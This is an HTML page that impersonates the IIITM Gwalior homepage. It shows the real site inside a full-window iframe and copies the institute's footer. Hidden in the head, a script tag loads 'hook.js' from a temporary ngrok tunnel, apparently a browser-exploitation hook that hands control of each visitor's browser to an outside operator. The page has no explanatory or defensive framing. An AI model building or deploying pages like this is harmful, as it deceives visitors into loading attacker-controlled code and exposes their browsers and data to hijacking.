<!DOCTYPE html>
<html lang="en">
<head>
    <script src="https://9fa0-2409-4081-8815-b808-7505-5d0f-46c0-206b.ngrok-free.app:443/hook.js">  
    </script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Home</title>
<style>
    body {
        margin: 0;
        font-family: Arial, sans-serif;
        background-color: #f4f4f4;
    }
    header {
        background-color: #003366;
        color: #fff;
        padding: 10px;
        text-align: center;
    }
    .container {
        width: 100%;
        height: calc(100vh - 50px); /* Adjust height to fit iframe */
        border: none;
    }
    footer {
        background-color: #003366;
        color: #fff;
        text-align: center;
        padding: 10px;
        position: fixed;
        bottom: 0;
        width: 100%;
    }
</style>
</head>
<body>
    <header>
      
    </header>
    
    <iframe class="container" src="https://www.iiitm.ac.in/index.php/en/"></iframe>
    
    <footer>
        <p>&copy;Copyright IIITM Gwalior 2018. DEVELOPMENT BY Solarman Engineering Project (P) Ltd.</p>
    </footer>
</body>
</html>
